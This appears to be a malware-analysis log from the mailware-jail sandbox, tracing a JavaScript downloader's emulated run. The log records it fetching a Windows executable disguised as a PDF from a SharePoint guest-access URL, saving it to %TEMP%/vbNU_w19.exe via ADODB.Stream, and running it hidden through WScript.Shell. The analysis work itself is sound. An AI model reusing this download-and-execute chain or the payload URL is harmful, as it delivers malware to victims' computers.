21 Nov 23:11:18 - mailware-jail, a malware sandbox ver. 0.10
21 Nov 23:11:18 - ------------------------
21 Nov 23:11:18 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
21 Nov 23:11:18 - Malware files: malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js
21 Nov 23:11:18 - Output file for sandbox dump: sandbox_dump_after.json
21 Nov 23:11:18 - Output directory for generated files: output/
21 Nov 23:11:18 - ==> Preparing Sandbox environment.
21 Nov 23:11:18 - => Executing: env/utils.js quitely
21 Nov 23:11:18 - => Executing: env/eval.js quitely
21 Nov 23:11:18 - => Executing: env/function.js quitely
21 Nov 23:11:18 - => Executing: env/wscript.js quitely
21 Nov 23:11:18 - => Executing: env/browser.js quitely
21 Nov 23:11:18 - => Executing: env/agents.js quitely
21 Nov 23:11:18 - => Executing: env/other.js quitely
21 Nov 23:11:18 - => Executing: env/console.js quitely
21 Nov 23:11:18 - ==> Executing malware file(s). =========================================
21 Nov 23:11:18 - => Executing: malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js verbosely, reporting silent catches
21 Nov 23:11:18 - Saving: output/malware_20161022_ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js
21 Nov 23:11:19 - ActiveXObject(WScript.Shell)
21 Nov 23:11:19 - new WScript.Shell[9]
21 Nov 23:11:19 - WScript.Shell[9].ExpandEnvironmentStrings(%TEMP%/vbNU_w19.exe)
21 Nov 23:11:19 - ActiveXObject(MSXML2.XMLHTTP)
21 Nov 23:11:19 - new MSXML2.XMLHTTP[10]
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].onreadystatechange = (undefined) 'undefined'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].open(GET,https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1,0)
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].method = (string) 'GET'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].url = (string) 'https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].async = (boolean) 'false'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].async.get() => (boolean) 'false'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].send(undefined)
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].method.get() => (string) 'GET'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].url.get() => (string) 'https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1'
21 Nov 23:11:20 - sync_req: MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].status = (number) '200'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].readystate = (number) '4'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].statustext = (string) 'OK'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].allresponseheaders = (string) '{"cache-control":"private","content-length":"120808","content-type":"application/pdf","accept-ranges":"bytes","etag":"\"{C192762E-1490-49C5-831F-008A9B492FA8},1\"","server":"Microsoft-IIS/8.5","x-sharepointhealthscore":"0","x-download-options":"noope ... (truncated)'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].onreadystatechange.get() => (undefined) 'undefined'
21 Nov 23:11:20 - 1: readystate
21 Nov 23:11:20 - 2: 4
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].readystate.get() => (number) '4'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].statustext.get() => (string) 'OK'
21 Nov 23:11:20 - 5: statusText
21 Nov 23:11:20 - 6: OK
21 Nov 23:11:20 - ActiveXObject(ADODB.Stream)
21 Nov 23:11:20 - new ADODB_Stream[11]
21 Nov 23:11:20 - ADODB_Stream[11].Open()
21 Nov 23:11:20 - ADODB_Stream[11].type = (number) '1'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)'
21 Nov 23:11:20 - ADODB_Stream[11].content = (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)'
21 Nov 23:11:20 - ADODB_Stream[11].Write(str) - 120808 bytes
21 Nov 23:11:20 - ADODB_Stream[11].size = (number) '120808'
21 Nov 23:11:20 - ADODB_Stream[11].position = (number) '0'
21 Nov 23:11:20 - ADODB_Stream[11].SaveToFile(%TEMP%/vbNU_w19.exe, 2)
21 Nov 23:11:20 - ADODB_Stream[11].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)'
21 Nov 23:11:20 - ADODB_Stream[11].Close()
21 Nov 23:11:20 - WScript.Shell[9].Run(%TEMP%/vbNU_w19.exe, 0, 0)
21 Nov 23:11:20 - ==> Cleaning up sandbox.
21 Nov 23:11:20 - ==> Script execution finished, dumping sandbox environment to a file.
21 Nov 23:11:20 - The sandbox context has been saved to: sandbox_dump_after.json
21 Nov 23:11:20 - Saving: output/_TEMP__vbNU_w19.exe